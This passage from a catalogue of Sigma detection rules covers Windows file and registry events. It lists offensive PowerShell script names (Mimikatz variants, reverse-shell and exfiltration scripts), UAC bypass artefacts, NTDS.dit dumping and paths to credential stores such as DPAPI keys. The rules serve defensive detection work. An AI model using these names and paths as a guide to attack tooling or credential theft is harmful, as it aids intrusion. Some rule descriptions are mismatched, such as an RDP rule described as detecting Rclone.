- C:\Windows\System32\narrator.exe.local
- C:\Windows\System32\wermgr.exe.local
Malicious PowerShell Scripts - FileCreation
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects the creation of known offensive powershell scripts used for exploitation
Detection logic
condition: 1 of selection_*
selection_generic:
TargetFilename|endswith:
- \Add-ConstrainedDelegationBackdoor.ps1
- \Add-Exfiltration.ps1
- \Add-Persistence.ps1
- \Add-RegBackdoor.ps1
- \Add-RemoteRegBackdoor.ps1
- \Add-ScrnSaveBackdoor.ps1
- \ADRecon.ps1
- \AzureADRecon.ps1
- \Check-VM.ps1
- \ConvertTo-ROT13.ps1
- \Copy-VSS.ps1
- \Create-MultipleSessions.ps1
- \DNS_TXT_Pwnage.ps1
- \dnscat2.ps1
- \Do-Exfiltration.ps1
- \DomainPasswordSpray.ps1
- \Download_Execute.ps1
- \Download-Execute-PS.ps1
- \Enable-DuplicateToken.ps1
- \Enabled-DuplicateToken.ps1
- \Execute-Command-MSSQL.ps1
- \Execute-DNSTXT-Code.ps1
- \Execute-OnTime.ps1
- \ExetoText.ps1
- \Exploit-Jboss.ps1
- \Find-AVSignature.ps1
- \Find-Fruit.ps1
- \Find-GPOLocation.ps1
- \Find-TrustedDocuments.ps1
- \FireBuster.ps1
- \FireListener.ps1
- \Get-ApplicationHost.ps1
- \Get-ChromeDump.ps1
- \Get-ClipboardContents.ps1
- \Get-ComputerDetail.ps1
- \Get-FoxDump.ps1
- \Get-GPPAutologon.ps1
- \Get-GPPPassword.ps1
- \Get-IndexedItem.ps1
- \Get-Keystrokes.ps1
- \Get-LSASecret.ps1
- \Get-MicrophoneAudio.ps1
- \Get-PassHashes.ps1
- \Get-PassHints.ps1
- \Get-RegAlwaysInstallElevated.ps1
- \Get-RegAutoLogon.ps1
- \Get-RickAstley.ps1
- \Get-Screenshot.ps1
- \Get-SecurityPackages.ps1
- \Get-ServiceFilePermission.ps1
- \Get-ServicePermission.ps1
- \Get-ServiceUnquoted.ps1
- \Get-SiteListPassword.ps1
- \Get-System.ps1
- \Get-TimedScreenshot.ps1
- \Get-UnattendedInstallFile.ps1
- \Get-Unconstrained.ps1
- \Get-USBKeystrokes.ps1
- \Get-VaultCredential.ps1
- \Get-VulnAutoRun.ps1
- \Get-VulnSchTask.ps1
- \Get-WebConfig.ps1
- \Get-WebCredentials.ps1
- \Get-WLAN-Keys.ps1
- \Gupt-Backdoor.ps1
- \HTTP-Backdoor.ps1
- \HTTP-Login.ps1
- \Install-ServiceBinary.ps1
- \Install-SSP.ps1
- \Invoke-ACLScanner.ps1
- \Invoke-ADSBackdoor.ps1
- \Invoke-AmsiBypass.ps1
- \Invoke-ARPScan.ps1
- \Invoke-BackdoorLNK.ps1
- \Invoke-BadPotato.ps1
- \Invoke-BetterSafetyKatz.ps1
- \Invoke-BruteForce.ps1
- \Invoke-BypassUAC.ps1
- \Invoke-Carbuncle.ps1
- \Invoke-Certify.ps1
- \Invoke-ConPtyShell.ps1
- \Invoke-CredentialInjection.ps1
- \Invoke-CredentialsPhish.ps1
- \Invoke-DAFT.ps1
- \Invoke-DCSync.ps1
- \Invoke-Decode.ps1
- \Invoke-DinvokeKatz.ps1
- \Invoke-DllInjection.ps1
- \Invoke-DNSUpdate.ps1
- \Invoke-DowngradeAccount.ps1
- \Invoke-EgressCheck.ps1
- \Invoke-Encode.ps1
- \Invoke-EventViewer.ps1
- \Invoke-Eyewitness.ps1
- \Invoke-FakeLogonScreen.ps1
- \Invoke-Farmer.ps1
- \Invoke-Get-RBCD-Threaded.ps1
- \Invoke-Gopher.ps1
- \Invoke-Grouper2.ps1
- \Invoke-Grouper3.ps1
- \Invoke-HandleKatz.ps1
- \Invoke-Interceptor.ps1
- \Invoke-Internalmonologue.ps1
- \Invoke-Inveigh.ps1
- \Invoke-InveighRelay.ps1
- \Invoke-JSRatRegsvr.ps1
- \Invoke-JSRatRundll.ps1
- \Invoke-KrbRelay.ps1
- \Invoke-KrbRelayUp.ps1
- \Invoke-LdapSignCheck.ps1
- \Invoke-Lockless.ps1
- \Invoke-MalSCCM.ps1
- \Invoke-Mimikatz.ps1
- \Invoke-MimikatzWDigestDowngrade.ps1
- \Invoke-Mimikittenz.ps1
- \Invoke-MITM6.ps1
- \Invoke-NanoDump.ps1
- \Invoke-NetRipper.ps1
- \Invoke-NetworkRelay.ps1
- \Invoke-NinjaCopy.ps1
- \Invoke-OxidResolver.ps1
- \Invoke-P0wnedshell.ps1
- \Invoke-P0wnedshellx86.ps1
- \Invoke-Paranoia.ps1
- \Invoke-PortScan.ps1
- \Invoke-PoshRatHttp.ps1
- \Invoke-PoshRatHttps.ps1
- \Invoke-PostExfil.ps1
- \Invoke-PowerDump.ps1
- \Invoke-PowerShellIcmp.ps1
- \Invoke-PowerShellTCP.ps1
- \Invoke-PowerShellTcpOneLine.ps1
- \Invoke-PowerShellTcpOneLineBind.ps1
- \Invoke-PowerShellUdp.ps1
- \Invoke-PowerShellUdpOneLine.ps1
- \Invoke-PowerShellWMI.ps1
- \Invoke-PowerThIEf.ps1
- \Invoke-PPLDump.ps1
- \Invoke-Prasadhak.ps1
- \Invoke-PsExec.ps1
- \Invoke-PsGcat.ps1
- \Invoke-PsGcatAgent.ps1
- \Invoke-PSInject.ps1
- \Invoke-PsUaCme.ps1
- \Invoke-ReflectivePEInjection.ps1
- \Invoke-ReverseDNSLookup.ps1
- \Invoke-Rubeus.ps1
- \Invoke-RunAs.ps1
- \Invoke-SafetyKatz.ps1
- \Invoke-SauronEye.ps1
- \Invoke-SCShell.ps1
- \Invoke-Seatbelt.ps1
- \Invoke-ServiceAbuse.ps1
- \Invoke-SessionGopher.ps1
- \Invoke-ShellCode.ps1
- \Invoke-SMBScanner.ps1
- \Invoke-Snaffler.ps1
- \Invoke-Spoolsample.ps1
- \Invoke-SSHCommand.ps1
- \Invoke-SSIDExfil.ps1
- \Invoke-StandIn.ps1
- \Invoke-StickyNotesExtract.ps1
- \Invoke-Tater.ps1
- \Invoke-Thunderfox.ps1
- \Invoke-ThunderStruck.ps1
- \Invoke-TokenManipulation.ps1
- \Invoke-Tokenvator.ps1
- \Invoke-TotalExec.ps1
- \Invoke-UrbanBishop.ps1
- \Invoke-UserHunter.ps1
- \Invoke-VoiceTroll.ps1
- \Invoke-Whisker.ps1
- \Invoke-WinEnum.ps1
- \Invoke-winPEAS.ps1
- \Invoke-WireTap.ps1
- \Invoke-WmiCommand.ps1
- \Invoke-WScriptBypassUAC.ps1
- \Invoke-Zerologon.ps1
- \Keylogger.ps1
- \MailRaider.ps1
- \New-HoneyHash.ps1
- \OfficeMemScraper.ps1
- \Offline_Winpwn.ps1
- \Out-CHM.ps1
- \Out-DnsTxt.ps1
- \Out-Excel.ps1
- \Out-HTA.ps1
- \Out-Java.ps1
- \Out-JS.ps1
- \Out-Minidump.ps1
- \Out-RundllCommand.ps1
- \Out-SCF.ps1
- \Out-SCT.ps1
- \Out-Shortcut.ps1
- \Out-WebQuery.ps1
- \Out-Word.ps1
- \Parse_Keys.ps1
- \Port-Scan.ps1
- \PowerBreach.ps1
- \powercat.ps1
- \Powermad.ps1
- \PowerRunAsSystem.psm1
- \PowerSharpPack.ps1
- \PowerUp.ps1
- \PowerUpSQL.ps1
- \PowerView.ps1
- \PSAsyncShell.ps1
- \RemoteHashRetrieval.ps1
- \Remove-Persistence.ps1
- \Remove-PoshRat.ps1
- \Remove-Update.ps1
- \Run-EXEonRemote.ps1
- \Schtasks-Backdoor.ps1
- \Set-DCShadowPermissions.ps1
- \Set-MacAttribute.ps1
- \Set-RemotePSRemoting.ps1
- \Set-RemoteWMI.ps1
- \Set-Wallpaper.ps1
- \Show-TargetScreen.ps1
- \Speak.ps1
- \Start-CaptureServer.ps1
- \Start-WebcamRecorder.ps1
- \StringToBase64.ps1
- \TexttoExe.ps1
- \VolumeShadowCopyTools.ps1
- \WinPwn.ps1
- \WSUSpendu.ps1
selection_invoke_sharp:
TargetFilename|contains: Invoke-Sharp
TargetFilename|endswith: .ps1
NPPSpy Hacktool Usage
- source: sigma
- technicques:
Description
Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- \NPPSpy.txt
- \NPPSpy.dll
RDP File Creation From Suspicious Application
- source: sigma
- technicques:
Description
Detects Rclone config file being created
Detection logic
condition: selection
selection:
Image|endswith:
- \brave.exe
- \CCleaner Browser\Application\CCleanerBrowser.exe
- \chromium.exe
- \firefox.exe
- \Google\Chrome\Application\chrome.exe
- \iexplore.exe
- \microsoftedge.exe
- \msedge.exe
- \Opera.exe
- \Vivaldi.exe
- \Whale.exe
- \Outlook.exe
- \RuntimeBroker.exe
- \Thunderbird.exe
- \Discord.exe
- \Keybase.exe
- \msteams.exe
- \Slack.exe
- \teams.exe
TargetFilename|contains: .rdp
Suspicious Creation TXT File in User Desktop
- source: sigma
- technicques:
- t1486
Description
Ransomware create txt file in the user Desktop
Detection logic
condition: selection
selection:
Image|endswith: \cmd.exe
TargetFilename|contains|all:
- \Users\
- \Desktop\
TargetFilename|endswith: .txt
UAC Bypass Using EventVwr
- source: sigma
- technicques:
Description
Detects the pattern of a UAC bypass using Windows Event Viewer
Detection logic
condition: selection and not filter
filter:
Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
selection:
TargetFilename|endswith:
- \Microsoft\Event Viewer\RecentViews
- \Microsoft\EventV~1\RecentViews
File With Uncommon Extension Created By An Office Application
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects the creation of files with an executable or script extension by an Office application.
Detection logic
condition: all of selection* and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_localassembly:
TargetFilename|contains: \AppData\Local\assembly\tmp\
TargetFilename|endswith: .dll
filter_optional_webex:
Image|endswith: \winword.exe
TargetFilename|contains: \AppData\Local\Temp\webexdelta\
TargetFilename|endswith:
- .dll
- .exe
filter_optional_webservicecache:
TargetFilename|contains|all:
- C:\Users\
- \AppData\Local\Microsoft\Office\
- \WebServiceCache\AllUsers
TargetFilename|endswith: .com
selection1:
Image|endswith:
- \excel.exe
- \msaccess.exe
- \mspub.exe
- \powerpnt.exe
- \visio.exe
- \winword.exe
selection2:
TargetFilename|endswith:
- .bat
- .cmd
- .com
- .dll
- .exe
- .hta
- .ocx
- .proj
- .ps1
- .scf
- .scr
- .sys
- .vbe
- .vbs
- .wsf
- .wsh
UAC Bypass Using Windows Media Player - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detection logic
condition: 1 of selection*
selection1:
TargetFilename|endswith: \AppData\Local\Temp\OskSupport.dll
TargetFilename|startswith: C:\Users\
selection2:
Image: C:\Windows\system32\DllHost.exe
TargetFilename: C:\Program Files\Windows Media Player\osk.exe
UAC Bypass Using MSConfig Token Modification - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detection logic
condition: selection
selection:
TargetFilename|endswith: \AppData\Local\Temp\pkgmgr.exe
TargetFilename|startswith: C:\Users\
DLL Search Order Hijackig Via Additional Space in Path
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files…) but with a space in order to trick DLL load search order and perform a “DLL Search Order Hijacking” attack
Detection logic
condition: selection
selection:
TargetFilename|endswith: .dll
TargetFilename|startswith:
- C:\Windows \
- C:\Program Files \
- C:\Program Files (x86) \
Suspicious MSExchangeMailboxReplication ASPX Write
- source: sigma
- technicques:
- t1190
- t1505
- t1505.003
Description
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
Detection logic
condition: selection
selection:
Image|endswith: \MSExchangeMailboxReplication.exe
TargetFilename|endswith:
- .aspx
- .asp
UAC Bypass Using Consent and Comctl32 - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detection logic
condition: selection
selection:
TargetFilename|endswith: \comctl32.dll
TargetFilename|startswith: C:\Windows\System32\consent.exe.@
Suspicious Creation with Colorcpl
- source: sigma
- technicques:
- t1564
Description
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Detection logic
condition: selection and not 1 of filter_*
filter_ext:
TargetFilename|endswith:
- .icm
- .gmmp
- .cdmp
- .camp
selection:
Image|endswith: \colorcpl.exe
Creation Of Non-Existent System DLL
- source: sigma
- technicques:
- t1574
- t1574.001
- t1574.002
Description
Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- :\Windows\System32\TSMSISrv.dll
- :\Windows\System32\TSVIPSrv.dll
- :\Windows\System32\wbem\wbemcomn.dll
- :\Windows\System32\WLBSCTRL.dll
- :\Windows\System32\wow64log.dll
- :\Windows\System32\WptsExtensions.dll
- \SprintCSP.dll
RemCom Service File Creation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects default RemCom service filename which indicates RemCom service installation and execution
Detection logic
condition: selection
selection:
TargetFilename|endswith: \RemComSvc.exe
NTDS.DIT Creation By Uncommon Process
- source: sigma
- technicques:
- t1003
- t1003.002
- t1003.003
Description
Detects creation of a file named “ntds.dit” (Active Directory Database) by an uncommon process or a process located in a suspicious directory
Detection logic
condition: selection_ntds and 1 of selection_process_*
selection_ntds:
TargetFilename|endswith: \ntds.dit
selection_process_img:
Image|endswith:
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
- \wsl.exe
- \wt.exe
selection_process_paths:
Image|contains:
- \AppData\
- \Temp\
- \Public\
- \PerfLogs\
CSExec Service File Creation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects default CSExec service filename which indicates CSExec service installation and execution
Detection logic
condition: selection
selection:
TargetFilename|endswith: \csexecsvc.exe
PSScriptPolicyTest Creation By Uncommon Process
- source: sigma
- technicques:
Description
Detects the creation of the “PSScriptPolicyTest” PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_generic:
Image|endswith:
- :\Program Files\PowerShell\7-preview\pwsh.exe
- :\Program Files\PowerShell\7\pwsh.exe
- :\Windows\System32\dsac.exe
- :\Windows\System32\sdiagnhost.exe
- :\Windows\System32\ServerManager.exe
- :\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
- :\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- :\Windows\System32\wsmprovhost.exe
- :\Windows\SysWOW64\sdiagnhost.exe
- :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe
- :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
selection:
TargetFilename|contains: __PSScriptPolicyTest_
Office Macro File Creation From Suspicious Process
- source: sigma
- technicques:
- t1566
- t1566.001
Description
Detects the creation of a office macro file from a a suspicious process
Detection logic
condition: all of selection_*
selection_cmd:
- Image|endswith:
- \cscript.exe
- \mshta.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
- ParentImage|endswith:
- \cscript.exe
- \mshta.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
selection_ext:
TargetFilename|endswith:
- .docm
- .dotm
- .xlsm
- .xltm
- .potm
- .pptm
Installation of TeamViewer Desktop
- source: sigma
- technicques:
- t1219
Description
TeamViewer_Desktop.exe is create during install
Detection logic
condition: selection
selection:
TargetFilename|endswith: \TeamViewer_Desktop.exe
UAC Bypass Using IEInstal - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detection logic
condition: selection
selection:
Image: C:\Program Files\Internet Explorer\IEInstal.exe
TargetFilename|contains: \AppData\Local\Temp\
TargetFilename|endswith: consent.exe
TargetFilename|startswith: C:\Users\
Legitimate Application Dropped Archive
- source: sigma
- technicques:
- t1218
Description
Detects programs on a Windows system that should not write an archive to disk
Detection logic
condition: selection
selection:
Image|endswith:
- \winword.exe
- \excel.exe
- \powerpnt.exe
- \msaccess.exe
- \mspub.exe
- \eqnedt32.exe
- \visio.exe
- \wordpad.exe
- \wordview.exe
- \certutil.exe
- \certoc.exe
- \CertReq.exe
- \Desktopimgdownldr.exe
- \esentutl.exe
- \finger.exe
- \notepad.exe
- \AcroRd32.exe
- \RdrCEF.exe
- \mshta.exe
- \hh.exe
TargetFilename|endswith:
- .zip
- .rar
- .7z
- .diagcab
- .appx
Malicious DLL File Dropped in the Teams or OneDrive Folder
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded
Detection logic
condition: selection
selection:
TargetFilename|contains|all:
- iphlpapi.dll
- \AppData\Local\Microsoft
Created Files by Microsoft Sync Center
- source: sigma
- technicques:
- t1055
- t1218
Description
This rule detects suspicious files created by Microsoft Sync Center (mobsync)
Detection logic
condition: selection_mobsync and filter_created_file
filter_created_file:
TargetFilename|endswith:
- .dll
- .exe
selection_mobsync:
Image|endswith: \mobsync.exe
Potential Winnti Dropper Activity
- source: sigma
- technicques:
- t1027
Description
Detects files dropped by Winnti as described in RedMimicry Winnti playbook
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- \gthread-3.6.dll
- \sigcmm-2.4.dll
- \Windows\Temp\tmp.bat
Drop Binaries Into Spool Drivers Color Folder
- source: sigma
- technicques:
Description
Detects the creation of suspcious binary files inside the “\windows\system32\spool\drivers\color" as seen in the blog referenced below
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- .dll
- .exe
- .sys
TargetFilename|startswith: C:\Windows\System32\spool\drivers\color\
Writing Local Admin Share
- source: sigma
- technicques:
- t1546
- t1546.002
Description
Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
Detection logic
condition: selection
selection:
TargetFilename|contains|all:
- \\\\127.0.0
- \ADMIN$\
WinSxS Executable File Creation By Non-System Process
- source: sigma
- technicques:
Description
Detects the creation of binaries in the WinSxS folder by non-system processes
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_system_location:
Image|startswith:
- C:\Windows\Systems32\
- C:\Windows\SysWOW64\
- C:\Windows\WinSxS\
selection:
TargetFilename|endswith: .exe
TargetFilename|startswith: C:\Windows\WinSxS\
NTDS.DIT Created
- source: sigma
- technicques:
- t1003
- t1003.003
Description
Detects creation of a file named “ntds.dit” (Active Directory Database)
Detection logic
condition: selection
selection:
TargetFilename|endswith: ntds.dit
Suspicious File Creation Activity From Fake Recycle.Bin Folder
- source: sigma
- technicques:
Description
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Detection logic
condition: selection
selection:
- Image|contains:
- RECYCLERS.BIN\
- RECYCLER.BIN\
- TargetFilename|contains:
- RECYCLERS.BIN\
- RECYCLER.BIN\
PowerShell Module File Created By Non-PowerShell Process
- source: sigma
- technicques:
Description
Detects the creation of a new PowerShell module “.psm1”, “.psd1”, “.dll”, “.ps1”, etc. by a non-PowerShell process
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_pwsh:
Image|endswith:
- :\Program Files\PowerShell\7-preview\pwsh.exe
- :\Program Files\PowerShell\7\pwsh.exe
- :\Windows\System32\poqexec.exe
- :\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
- :\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- :\Windows\SysWOW64\poqexec.exe
- :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe
- :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
selection:
TargetFilename|contains:
- \WindowsPowerShell\Modules\
- \PowerShell\7\Modules\
UAC Bypass Using IDiagnostic Profile - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the creation of a file by “dllhost.exe” in System32 directory part of “IDiagnosticProfileUAC” UAC bypass technique
Detection logic
condition: selection
selection:
Image|endswith: \DllHost.exe
TargetFilename|endswith: .dll
TargetFilename|startswith: C:\Windows\System32\
Dynamic CSharp Compile Artefact
- source: sigma
- technicques:
- t1027
- t1027.004
Description
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution
Detection logic
condition: selection
selection:
TargetFilename|endswith: .cmdline
CrackMapExec File Indicators
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects file creation events with filename patterns used by CrackMapExec.
Detection logic
condition: selection_path and 1 of selection_names_*
selection_names_re:
- TargetFilename|re: \\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.txt$
- TargetFilename|re: \\[a-zA-Z]{8}\.tmp$
selection_names_str:
TargetFilename|endswith:
- \temp.ps1
- \msol.ps1
selection_path:
TargetFilename|startswith: C:\Windows\Temp\
Suspicious ASPX File Drop by Exchange
- source: sigma
- technicques:
- t1505
- t1505.003
Description
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Detection logic
condition: all of selection*
selection:
CommandLine|contains: MSExchange
Image|endswith: \w3wp.exe
TargetFilename|contains:
- FrontEnd\HttpProxy\
- \inetpub\wwwroot\aspnet_client\
selection_types:
TargetFilename|endswith:
- .aspx
- .asp
- .ashx
Self Extraction Directive File Created In Potentially Suspicious Location
- source: sigma
- technicques:
- t1218
Description
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the “iexpress.exe” utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded “.sed” entries.
Detection logic
condition: selection
selection:
TargetFilename|contains:
- :\ProgramData\
- :\Temp\
- :\Windows\System32\Tasks\
- :\Windows\Tasks\
- :\Windows\Temp\
- \AppData\Local\Temp\
TargetFilename|endswith: .sed
Potential Initial Access via DLL Search Order Hijacking
- source: sigma
- technicques:
- t1566
- t1566.001
- t1574
- t1574.001
Description
Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
Detection logic
condition: selection and not filter
filter:
Image|endswith: \cmd.exe
TargetFilename|contains|all:
- \Users\
- \AppData\
- \Microsoft\OneDrive\
- \api-ms-win-core-
selection:
Image|endswith:
- \winword.exe
- \excel.exe
- \powerpnt.exe
- \MSACCESS.EXE
- \MSPUB.EXE
- \fltldr.exe
- \cmd.exe
- \certutil.exe
- \mshta.exe
- \cscript.exe
- \wscript.exe
- \curl.exe
- \powershell.exe
- \pwsh.exe
TargetFilename|contains:
- \Microsoft\OneDrive\
- \Microsoft OneDrive\
- \Microsoft\Teams\
- \Local\slack\app-
- \Local\Programs\Microsoft VS Code\
TargetFilename|contains|all:
- \Users\
- \AppData\
TargetFilename|endswith: .dll
NTDS Exfiltration Filename Patterns
- source: sigma
- technicques:
- t1003
- t1003.003
Description
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- \All.cab
- .ntds.cleartext
Suspicious Unattend.xml File Access
- source: sigma
- technicques:
- t1552
- t1552.001
Description
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
Detection logic
condition: selection
selection:
TargetFilename|endswith: \unattend.xml
Suspicious File Event With Teams Objects
- source: sigma
- technicques:
- t1528
Description
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Detection logic
condition: selection and not filter
filter:
Image|contains: \Microsoft\Teams\current\Teams.exe
selection:
TargetFilename|contains:
- \Microsoft\Teams\Cookies
- \Microsoft\Teams\Local Storage\leveldb
Renamed VsCode Code Tunnel Execution - File Indicator
- source: sigma
- technicques:
Description
Detects the creation of a file with the name “code_tunnel.json” which indicate execution and usage of VsCode tunneling utility by an “Image” or “Process” other than VsCode.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_name:
Image|endswith:
- \code-tunnel.exe
- \code.exe
selection:
TargetFilename|endswith: \code_tunnel.json
Unusual File Modification by dns.exe
- source: sigma
- technicques:
- t1133
Description
Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detection logic
condition: selection and not filter
filter:
TargetFilename|endswith: \dns.log
selection:
Image|endswith: \dns.exe
Access To Windows Credential History File By Uncommon Application
- source: sigma
- technicques:
- t1555
- t1555.004
Description
Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz “dpapi::credhist” function
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_explorer:
Image|endswith: :\Windows\explorer.exe
filter_main_system_folders:
Image|contains:
- :\Program Files\
- :\Program Files (x86)\
- :\Windows\system32\
- :\Windows\SysWOW64\
selection:
FileName|endswith: \Microsoft\Protect\CREDHIST
Access To Windows DPAPI Master Keys By Uncommon Application
- source: sigma
- technicques:
- t1555
- t1555.004
Description
Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz “dpapi::masterkey” function
Detection logic
condition: selection and not 1 of filter_*
filter_system_folders:
Image|contains:
- :\Program Files\
- :\Program Files (x86)\
- :\Windows\system32\
- :\Windows\SysWOW64\
selection:
FileName|contains:
- \Microsoft\Protect\S-1-5-18\
- \Microsoft\Protect\S-1-5-21-
Access To Potentially Sensitive Sysvol Files By Uncommon Application
- source: sigma
- technicques:
- t1552
- t1552.006
Description
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_generic:
Image|startswith:
- :\Program Files (x86)\
- :\Program Files\
- :\Windows\explorer.exe
- :\Windows\system32\
- :\Windows\SysWOW64\
selection:
FileName|contains|all:
- \sysvol\
- \Policies\
FileName|endswith:
- audit.csv
- Files.xml
- GptTmpl.inf
- groups.xml
- Registry.pol
- Registry.xml
- scheduledtasks.xml
- scripts.ini
- services.xml
FileName|startswith: \\
Potentially Suspicious Self Extraction Directive File Created
- source: sigma
- technicques:
- t1218
Description
Detects the creation of a binary file with the “.sed” extension. The “.sed” extension stand for Self Extraction Directive files. These files are used by the “iexpress.exe” utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded “.sed” entries. Usually “.sed” files are simple ini files and not PE binaries.
Detection logic
condition: selection
selection:
TargetFilename|endswith: .sed
Potential Ursnif Malware Activity - Registry
- source: sigma
- technicques:
- t1112
Description
Detects registry keys related to Ursnif malware.
Detection logic
condition: selection and not filter
filter:
TargetObject|contains:
- \SOFTWARE\AppDataLow\Software\Microsoft\Internet Explorer\
- \SOFTWARE\AppDataLow\Software\Microsoft\RepService\
- \SOFTWARE\AppDataLow\Software\Microsoft\IME\
- \SOFTWARE\AppDataLow\Software\Microsoft\Edge\
selection:
EventType: CreateKey
TargetObject|contains: \Software\AppDataLow\Software\Microsoft\
Potential NetWire RAT Activity - Registry
- source: sigma
- technicques:
- t1112
Description
Detects registry keys related to NetWire RAT
Detection logic
condition: selection
selection:
EventType: CreateKey
TargetObject|contains: \software\NetWire
RedMimicry Winnti Playbook Registry Manipulation
- source: sigma
- technicques:
- t1112
Description
Detects actions caused by the RedMimicry Winnti playbook
Detection logic
condition: selection
selection:
TargetObject|contains: HKLM\SOFTWARE\Microsoft\HTMLHelp\data
Security Support Provider (SSP) Added to LSA Configuration
- source: sigma
- technicques:
- t1547
- t1547.005
Description
Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_msiexec:
Image:
- C:\Windows\system32\msiexec.exe
- C:\Windows\syswow64\MsiExec.exe
selection:
TargetObject|endswith:
- \Control\Lsa\Security Packages
- \Control\Lsa\OSConfig\Security Packages
Wdigest CredGuard Registry Modification
- source: sigma
- technicques:
- t1112
Description
Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
Detection logic
condition: selection
selection:
TargetObject|endswith: \IsCredGuardEnabled
HybridConnectionManager Service Installation - Registry
- source: sigma
- technicques:
- t1608
Description
Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
Detection logic
condition: selection1 or selection2
selection1:
TargetObject|contains: \Services\HybridConnectionManager
selection2:
Details|contains: Microsoft.HybridConnectionManager.Listener.exe
EventType: SetValue
Shell Open Registry Keys Manipulation
- source: sigma
- technicques:
- t1546
- t1546.001
- t1548
- t1548.002
Description
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
Detection logic
condition: selection1 or selection2 or (selection3 and not filter_sel3)
filter_sel3:
Details: (Empty)
selection1:
Details|contains: \Software\Classes\{
EventType: SetValue
TargetObject|endswith: Classes\ms-settings\shell\open\command\SymbolicLinkValue
selection2:
TargetObject|endswith: Classes\ms-settings\shell\open\command\DelegateExecute
selection3:
EventType: SetValue
TargetObject|endswith:
- Classes\ms-settings\shell\open\command\(Default)
- Classes\exefile\shell\open\command\(Default)
Esentutl Volume Shadow Copy Service Keys
- source: sigma
- technicques:
- t1003
- t1003.002
Description
